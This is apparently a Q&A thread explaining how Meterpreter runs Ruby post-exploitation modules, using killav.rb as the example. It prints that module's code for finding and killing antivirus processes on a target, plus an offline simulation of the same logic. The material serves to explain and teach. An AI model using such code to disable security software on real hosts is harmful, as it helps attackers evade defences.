6

I've been using Meterpreter for some time and I'm still quite new to it, and one of the questions I have is how its module loading works.

Correct me if I'm wrong, as I'm still learning how to use Metasploit, but to the best of my knowledge the modules that you can load onto Meterpreter, such as killav.rb, are written in Ruby. This module is supposed to be loaded onto Meterpreter and executed.

How is the Ruby script executed if the Ruby interpreter does not exist on the system? Sorry if my question sounds basic or if what I know is wrong as I'm just getting into using Metasploit.

e-sushi
eclipse

2 Answers

3

The code doesn't actually run on the remote host. The Ruby module is executed on your machine and uses the Metasploit API to execute code on the other side. The Metasploit API has a lot of Windows APIs mapped as RPC calls (called Railgun). Meterpreter is written in cpp; there is no Ruby component or embedding done on the "client" side. Read more here: How to use Railgun for Windows post exploitation.

GAD3R
Jonathan Allon
2

Let's start with the basic understanding: once you have a Meterpreter session you get access to the modules of Metasploit that perform post-exploitation activities. Now take any activity that you initiate, let's say killav.rb. The code in this file interacts with the Metasploit Meterpreter module that you have, and it uses Railgun. Railgun is a very powerful post-exploitation feature exclusive to the Windows Meterpreter. It allows you to have complete control of your target machine's Windows API. It passes the instruction to the target system. Let me give you an insight into the code of killav.rb:

    # Excerpt of the run method of modules/post/windows/manage/killav.rb.
    # skip_process_name?, vprint_status, print_status, print_good and
    # print_error are provided by the surrounding Msf::Post module; client
    # is the Meterpreter session object, which lives on the attacker's side.
    def run
      # The wordlist ships with Metasploit under data/wordlists
      avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
                                    'av_hips_executables.txt')).strip
      avs = Set.new(avs.split("\n"))

      processes_found = 0
      processes_killed = 0
      # Asks the target for its process list over the Meterpreter channel
      client.sys.process.get_processes().each do |x|
        next if skip_process_name?(x['name'].downcase)
        vprint_status("Checking #{x['name'].downcase} ...")
        if avs.include?(x['name'].downcase)
          processes_found += 1
          print_status("Attempting to terminate '#{x['name']}' (PID: #{x['pid']}) ...")
          begin
            # Sends a kill request; the target performs the termination itself
            client.sys.process.kill(x['pid'])
            processes_killed += 1
            print_good("#{x['name']} terminated.")
          rescue Rex::Post::Meterpreter::RequestError
            # The target answered the request with an error
            print_error("Failed to terminate '#{x['name']}' (PID: #{x['pid']}).")
          end
        end
      end
    end

If you notice the av_hips_executables.txt file

(Note: this file will also be available in the Metasploit app location /usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt)

That file contains the list of all the known executables that are associated with a running antivirus; the code after that is purely to detect its PID and kill the PID. And since everything is passed via the Meterpreter API, it does not depend on whether the client side has Ruby or not.

Dhruv Shah
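To make the division of labour described in both answers concrete, here is an added example (my own code, not Metasploit's or the module's). It replays the attacker-side logic of killav.rb against a stand-in for client.sys.process that records what would be sent to the target and returns canned answers, so you can see that all the Ruby runs locally and the target only ever receives two kinds of request. The process list, the wordlist excerpt and the "protected" PID are constructed; the request names mirror the stdapi command names, but the FakeProcessApi class, RequestError class and kill_av/run_demo helpers are assumptions made for this example and are not part of the Metasploit API.

```ruby
require 'set'

# Stand-in for Rex::Post::Meterpreter::RequestError, which the real client
# raises when the target answers a request with an error status.
class RequestError < StandardError; end

# Stand-in for client.sys.process (constructed for this example, not the
# Metasploit API). Nothing here runs on the target: it records the requests
# that would travel over the Meterpreter channel and returns what a target
# would answer, so the attacker-side Ruby can be exercised offline.
class FakeProcessApi
  attr_reader :requests

  def initialize(processes, protected_pids)
    @processes = processes      # what the target would report
    @protected = protected_pids # PIDs the target refuses to terminate
    @requests = []
  end

  # Mirrors the stdapi_sys_process_get_processes request: the target
  # enumerates its own processes and answers with name/pid pairs.
  def get_processes
    @requests << ['stdapi_sys_process_get_processes']
    @processes.map { |p| { 'pid' => p[:pid], 'name' => p[:name] } }
  end

  # Mirrors the stdapi_sys_process_kill request: the target attempts the
  # termination itself; a failure comes back as an error reply.
  def kill(pid)
    @requests << ['stdapi_sys_process_kill', pid]
    raise RequestError, "access denied for pid #{pid}" if @protected.include?(pid)
    @processes.reject! { |p| p[:pid] == pid }
    true
  end
end

# The attacker-side logic of killav.rb's run method, with the framework's
# print helpers replaced by a log array so the outcome can be inspected.
# Returns [processes_found, processes_killed].
def kill_av(process_api, wordlist_text, log)
  avs = Set.new(wordlist_text.strip.split("\n").map(&:downcase))
  found = 0
  killed = 0
  process_api.get_processes.each do |x|
    name = x['name'].downcase
    next unless avs.include?(name)
    found += 1
    begin
      process_api.kill(x['pid'])
      killed += 1
      log << "[+] #{x['name']} terminated."
    rescue RequestError => e
      # Same failure path as the module: the target said no, the loop moves on
      log << "[-] Failed to terminate '#{x['name']}' (PID: #{x['pid']}): #{e.message}"
    end
  end
  [found, killed]
end

# Constructed target state: a process list as the target would report it.
SAMPLE_PROCESSES = [
  { pid: 4,    name: 'System' },
  { pid: 812,  name: 'MsMpEng.exe' },  # Defender engine
  { pid: 1504, name: 'explorer.exe' },
  { pid: 2210, name: 'avp.exe' },      # Kaspersky
  { pid: 3000, name: 'notepad.exe' },
].freeze

# Constructed excerpt in the format of data/wordlists/av_hips_executables.txt
SAMPLE_WORDLIST = "msmpeng.exe\navp.exe\nekrn.exe\n"

def run_demo
  # PID 812 is marked protected to exercise the RequestError branch
  api = FakeProcessApi.new(SAMPLE_PROCESSES.map(&:dup), [812])
  log = []
  found, killed = kill_av(api, SAMPLE_WORDLIST, log)
  { found: found, killed: killed, requests: api.requests, log: log }
end

if __FILE__ == $PROGRAM_NAME
  result = run_demo
  puts result[:log]
  puts "#{result[:killed]} of #{result[:found]} processes killed"
  puts "Requests the target saw: #{result[:requests].inspect}"
end
```

The recorded requests are the whole of what crosses the wire: one process enumeration and one kill per matching name. The wordlist lookup, the lowercasing and the counting all happen in Ruby on the attacker's machine, which is why a Ruby interpreter on the target is never needed. The protected-PID case shows the other half of the picture: when the target cannot carry out a request, the module only learns of it through the error reply, which is what the rescue of RequestError in killav.rb handles.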